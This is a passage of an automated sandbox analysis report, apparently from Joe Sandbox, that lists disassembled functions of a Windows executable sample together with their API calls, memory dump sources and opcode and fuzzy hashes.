                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __setmode$DebugOutputString_fprintf
                                                                          • String ID:
                                                                          • API String ID: 1792727568-0
                                                                          • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                          • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                          Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$AttributesLayered
                                                                          • String ID:
                                                                          • API String ID: 2169480361-0
                                                                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                          Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                          • String ID: cdecl
                                                                          • API String ID: 3850814276-3896280584
                                                                          • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                          • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                          Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                          • _memmove.LIBCMT ref: 0046D475
                                                                          • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 2502553879-0
                                                                          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                          Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 00448C69
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 312131281-0
                                                                          • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                          • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                          • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                          • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                          Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastacceptselect
                                                                          • String ID:
                                                                          • API String ID: 385091864-0
                                                                          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                          Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                          Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                          • GetStockObject.GDI32(00000011), ref: 00430258
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                                          • String ID:
                                                                          • API String ID: 1358664141-0
                                                                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                          Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                          • String ID:
                                                                          • API String ID: 2880819207-0
                                                                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                          Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                          Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 0043392E
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • __wsplitpath.LIBCMT ref: 00433950
                                                                          • __wcsicoll.LIBCMT ref: 00433974
                                                                          • __wcsicoll.LIBCMT ref: 0043398A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                          • String ID:
                                                                          • API String ID: 1187119602-0
                                                                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                          Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1597257046-0
                                                                          • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                          • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                          Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                          • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                          • String ID:
                                                                          • API String ID: 237123855-0
                                                                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                          Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObject$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 3349847261-0
                                                                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                          Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
